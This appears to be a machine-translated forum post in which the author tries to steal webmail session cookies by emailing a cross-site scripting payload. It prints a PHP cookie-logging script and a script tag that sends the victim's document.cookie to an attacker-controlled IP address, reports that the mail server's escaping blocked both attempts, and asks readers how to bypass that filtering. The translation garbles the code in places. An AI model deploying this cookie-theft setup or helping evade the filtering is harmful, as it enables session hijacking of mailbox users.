For example, I recently studied XSS attacks and suddenly thought of this question: "How can I send an email containing a script and obtain the Session of the mailbox host ?"
?
". If we can do this, it will surely create a security storm on the Internet.
I would like to practice it if I have an idea.
This is the curiosity of computer workers.
1. Try the webpage mailbox
* First write a small PHP (Vole. php
) File to accept sent session information and save it in the file
<? Php <br/> $ IP = $ _ server ['remote _ ADDR ']; <br/> $ Referer = $ _ server ['HTTP _ referer']; <br/> $ agent = $ _ server ['HTTP _ user_agent ']; <br/> $ DATA = $ _ Get ["Val"]; <br/> $ time = date ("Y-m-d G: I: S "); <br/> $ text = "<HTML> <body> <br/> <p> ". $ time. "</P> // la date <br/> <p> ". $ IP. "</P> // ip d' utilisateur <br/> <p> User Agent :". $ agent. "</P> // le type de navigateur <br/> <p> Referer :". $ referer. "</P> // URL <br/ > <P> session :". $ data. "</P> // cookie <br/> <p >==================================</P> <br/> </br> </body> </ptml> "; <br/> $ file = fopen('cinfos.html ', 'A'); // enregistrer CES Infos dans un fichier <br/> fwrite ($ file, $ text ); <br/> fclose ($ file); <br/>?>
* After the preparation is complete, send an email containing a script to a mailbox.
The email content is as follows:
<SCRIPT> document. Location = "http://X.X.X.X/vole.php? Val = "+ document. Cookie; </SCRIPT>
/* Four x Host IP addresses */
* Check the email in the browser to see if the script in the email will be loaded by the browser.
The results also failed, and the page source code was found.<
And> are replaced by the email server
& Lt
Et
& Gt
, HTML Escape Character
I tried to find other technologies to avoid replacement, but it was not possible. If some cool people knew the solution, the younger brother immediately begged for a solution.
2. Try the desktop mailbox Software
The result still ends with a failure.
The younger brother posted this article hoping to receive guidance from the oX. Thank you first.